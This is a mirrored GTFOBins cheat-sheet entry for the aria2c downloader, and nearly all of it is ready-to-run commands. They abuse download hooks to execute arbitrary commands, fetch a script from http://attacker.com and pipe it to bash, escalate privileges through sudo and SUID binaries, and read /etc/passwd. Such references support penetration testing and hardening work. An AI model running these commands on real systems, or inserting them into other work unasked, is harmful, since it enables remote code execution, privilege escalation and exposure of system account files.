mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-01-24 04:22:52 +01:00
39 lines
1.4 KiB
Markdown
39 lines
1.4 KiB
Markdown
---
|
|
description: Note that the subprocess is immediately sent to the background.
|
|
functions:
|
|
command:
|
|
- code: |
|
|
COMMAND='id'
|
|
TF=$(mktemp)
|
|
echo "$COMMAND" > $TF
|
|
chmod +x $TF
|
|
aria2c --on-download-error=$TF http://x
|
|
- description: The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script. Note that said file needs to be written on disk in order to be executed. `--allow-overwrite` is needed if this is executed multiple times with the same GID.
|
|
code: aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa
|
|
file-download:
|
|
- description: Fetch a remote file via HTTP GET request. Use `--allow-overwrite` if needed.
|
|
code: |
|
|
URL=http://attacker.com/file_to_get
|
|
LFILE=file_to_save
|
|
aria2c -o "$LFILE" "$URL"
|
|
sudo:
|
|
- code: |
|
|
COMMAND='id'
|
|
TF=$(mktemp)
|
|
echo "$COMMAND" > $TF
|
|
chmod +x $TF
|
|
sudo aria2c --on-download-error=$TF http://x
|
|
suid:
|
|
- description: It reads data from files, it may be used to do privileged reads or disclose files outside a restricted file system.
|
|
- code: |
|
|
LFILE='/etc/passwd'
|
|
aria2c -i $LFILE
|
|
limited-suid:
|
|
- code: |
|
|
COMMAND='id'
|
|
TF=$(mktemp)
|
|
echo "$COMMAND" > $TF
|
|
chmod +x $TF
|
|
./aria2c --on-download-error=$TF http://x
|
|
---
|